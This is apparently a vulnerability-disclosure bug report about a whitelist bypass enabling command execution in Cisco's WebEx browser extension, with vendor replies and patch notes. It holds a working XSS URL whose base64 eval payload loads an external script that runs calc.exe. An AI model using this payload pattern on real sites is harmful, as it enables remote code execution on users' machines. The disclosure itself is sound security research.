|Issue 1100||Cisco: WebEx: New Arbitrary Command Execution in 1.0.5 via Module Whitelist Bypass|
|Starred by 2 users||Project Member Reported by firstname.lastname@example.org, Jan 25||Back to list|
In version 1.0.5 of the WebEx extension, Cisco added a GpcComponentName whitelist to prevent exploitation via XSS, preventing issue 1096 . This can be defeated by putting a module signed by Cisco under GpcUrlRoot, and tricking the installation routine to overwrite one of the whitelisted modules with it. As I already have a copy of MSVCRT.DLL signed by Cisco, I used this one in my exploit. This requires an XSS on *.webex.com, but they're unfortunately not difficult to find. Here is a working example: https://support.webex.com/support/documentation/wwhelp/wwhimpl/common/html/frameset.htm#?");eval(atob("ZD1kb2N1bWVudDsocz1kLmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpKS5zcmM9Jy8vbG9jay5jbXB4Y2hnOGIuY29tL0pvUGhlaTdhL3dlYmV4LmpzJztkLmhlYWQuYXBwZW5kQ2hpbGQocyk7"));(" (The eval just loads this script: https://lock.cmpxchg8b.com/JoPhei7a/webex.js) Please note, that the script waits 10 seconds before running calc.exe to make sure everything is loaded. This bug is subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will automatically become visible to the public.
I made some minor changes to the exploit script.
Response: Hi Tavis, We are tracking this issue under the same ID as the previously reported issue: PSIRT-0085137008. Please include it on all communication to us regarding this vulnerability. I have also filed CSCvc88943 for our developers to investigate further. [...]
It looks like Cisco have released version 1.0.7, which adds a whitelist for the GpcExtName and GpcUnpackName properties that I was using in my exploit. It looks like they correctly handle Mac and Windows, and have also added some verification on GpcInitCall/GpcExitCall/etc so that functions have to match a RegEx. This looks like a huge improvement. Another very quick response from Cisco, I continue to be impressed with Cisco's response time. I do not currently know of any way to defeat this new patch. As the patch is public now, let's mark this fixed. (Note: I believe the XSS is an independently discovered duplicate of CVE-2009-3731, which is already public). http://www.webworks.com/Security/2009-0001/ https://web.archive.org/web/20101023162802/http://www.stratsec.net/Research/Advisories/VMWare-WebWorks-XSS
Cisco's advisory is here https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170124-webex Apparently Firefox and Internet Explorer were also affected, but not on Mac or Linux. I didn't check, but have no reason to doubt Cisco's assessment.
|► Sign in to add a comment|